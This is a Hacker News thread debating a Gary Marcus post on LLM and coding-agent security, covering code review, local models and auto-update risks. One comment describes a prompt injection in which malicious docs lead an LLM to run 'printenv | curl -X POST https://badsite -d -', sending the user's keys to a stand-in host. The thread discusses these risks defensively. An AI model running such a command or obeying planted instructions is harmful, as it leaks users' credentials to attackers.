LLMs and coding agents are a security nightmare

47 flail 17 8/18/2025, 11:04:34 AM garymarcus.substack.com ↗

Comments (17)

dijksterhuis · 1h ago
> RRT (Refrain Restrict Trap).

> Refrain from using LLMs in high-risk or safety-critical scenarios.

> Restrict the execution, permissions, and levels of access, such as what files a given system could read and execute, for example.

> Trap inputs and outputs to the system, looking for potential attacks or leakage of sensitive data out of the system.

this, this, this, a thousand billion times this.

this isn’t new advice either. it’s been around for circa ten years at this point (possibly longer).

lylejantzi3rd · 13m ago
Is there a market for apps that use local LLMs? I don't know of many people who make their purchasing decisions based on security, but I do know lawyers are one subset that do.

Using a local LLM isn't a surefire solution unless you also restrict the app's permissions, but it's got to be better than using chatgpt.com. The question is: how much better?

flail · 2m ago
1. Organizations that care about controlling their data. Pretty much the same ones that were reluctant to embrace the cloud and kept their own server rooms.

An additional flavor to that: even if my professional AI agent license guarantees that my data won't be used to train generic models, etc., when a US court would make OpenAI reveal your data, they will, no matter where it is physically stored. That's kinda a loophole in law-making, as e.g., the EU increasingly requires data to be stored locally.

However, if one really wants control over the data, they might prefer to run everything in a local setup. Which is going to be way more complicated and expensive.

2. Small Language Models (SLMs). LLMs are generic. That's their whole point. No LLM-based solution needs all LLM's capabilities. And yet training and using the model, because of its sheer size, is expensive.

In the long run, it may be more viable to deploy and train one's own, much smaller model operating only on very specific training data. The tradeoff here is that you get a cheaper in use and more specialized tool, at the cost of up-front development and no easy way of upgrading a model when a new wave of LLMs is deployed.

rpicard · 11m ago
I’ve noticed a strong negative streak in the security community around LLMs. Lots of comments about how they’ll just generate more vulnerabilities, “junk code”, etc.

It seems very short sighted.

I think of it more like self driving cars. I expect the error rate to quickly become lower than humans.

Maybe in a couple of years we’ll consider it irresponsible not to write security and safety critical code with frontier LLMs.

tptacek · 3m ago
There are plenty of security people on the other side of this issue; they're just not making news, because the way you make news in security is by announcing vulnerabilities. By way of example, last I checked, Dave Aitel was at OpenAI.
andrepd · 2m ago
Let's maybe cross that bridge when (more important, if!) we come to it then? We have no idea how LLMs are gonna evolve, but clearly now they are very much not ready for the job.
diggan · 1h ago
> might ok a code change they shouldn’t have

Is the argument that developers who are less experience/in a hurry, will just accept whatever they're handed? In that case, this would be as true for random people submitting malicious PRs that someone accepts without reading, even without an LLM involved at all? Seems like an odd thing to call a "security nightmare".

flail · 39m ago
One thing relying on coding agents does is it changes the nature of the work from typing-heavy (unless you count prompting) to code-review-heavy.

Cognitively, these are fairly distinct tasks. When creating code, we imagine architecture, tech solutions, specific ways of implementing, etc., pre-task. When reviewing code, we're given all these.

Sure, some of that thinking would go into prompting, but not to such a detail as when coding.

What follows is that it's easier to make a vulnerability pass through. More so, given that we're potentially exposed to more of them. After all, no one coding manually would consciously add vulnerability to their code base. Ultimately, all such cases are by omission.

A compromised coding agent would try that. So, we have to change the lenses from "vulnerability by omission only" to "all sorts of malicious active changes" too.

An entirely separate discussion is who reviews the code and what security knowledge they have. It's easy to dismiss the concern once a developer has been dealing with security for years. But these are not the only developers who use coding agents.

SamuelAdams · 57m ago
I was also confused. In our organization all PR’s must always be reviewed by a knowledgeable human. It does not matter if it was all LLM generated or written by a person.

If insecure code makes it past that then there are bigger issues - why did no one catch this, is the team understanding the tech stack well enough, and did security scanning / tooling fall short, and if so how can that be improved?

IanCal · 41m ago
Aside from noting that reviews are not perfect and increased attacks is a risk anyway - the other major risk is running code on your dev machine. You may think to review this more for an unknown pr than an llm suggestion.
reilly3000 · 38m ago
The attack isn’t bad code. It could be malicious docs that tell the LLM to make a tool call to printenv | curl -X POST https://badsite -d - and steal your keys.
Benjammer · 12m ago
This is the common refrain from the anti-AI crowd, they start by talking about an entire class of problems that already exist in humans-only software engineering, without any context or caveats. And then, when someone points out these problems exist with humans too, they move the goalposts and make it about the "volume" of code and how AI is taking us across some threshold where everything will fall apart.

The telling thing is they never mention this "threshold" in the first place, it's only a response to being called on the bullshit.

senko · 1h ago
tldr: Gary Marcus Went To Black Hat - What He Saw There Will Shock You

(it won't if you've been following LLM coding space, but anyway...)

I hoped Gary would have at least linked to the talks so people could get the actual info without his lenses, but no such luck.

But he did link to The Post A Few Years Ago Where He Predicted It All.

(yes I'm cynical: the post is mostly on point, but by now I wouldn't trust Marcus if he announced People Breathe Oxygen).

flail · 31m ago
Save for Gary Marcus' ego, which you're right about, most of the article is written by Nathan Hamiel from Kudelski Security. The voice of the post sounds weird because Nathan is referred to in a third person, but from the content, it's pretty clear that much of that is not Gary Marcus.

Also, slides from the Nvidia talk, which they refer to a lot, are linked. The Nathan's presentation links only to the conference website.

popcorncowboy · 34m ago
The Gary Marcus Schtick at this point is to shit on LLM-anything, special extra poop if it's sama-anything. Great, I don't even disagree. But it's hard to read anything he puts up these days as he's become a caricature of the enlightened-LLM-hater to the extent that his work reads like auto-gen "whatever you said but the opposite, and also you suck, I'm Gary Marcus".
sneak · 1h ago
I have recently written security-sensitive code using Opus 4. I of course reviewed every line and made lots of both manual and prompt-based revisions.

Cloudflare apparently did something similar recently.

It is more than possible to write secure code with AI, just as it is more than possible to write secure code with inexperienced junior devs.

As for the RCE vector; Claude Code has realtime no-intervention autoupdate enabled by default. Everyone running it has willfully opted in to giving Anthropic releng (and anyone who can coerce/compel them) full RCE on their machine.

Separately from AI, most people deploy containers based on tagged version names, not cryptographic hashes. This is trivially exploitable by the container registry.

We have learned nothing from Solarwinds.

senko · 1h ago
> Claude Code has realtime no-intervention autoupdate enabled by default. Everyone running it has willfully opted in to giving Anthropic releng (and anyone who can coerce/compel them) full RCE on their machine.

Isn't that the same for Chrome, VSCode, and any upstream-managed (as opposed to distro/os managed) package channel with auto updates?

It's a bad default, but pretty much standard practice, and done in the name of security.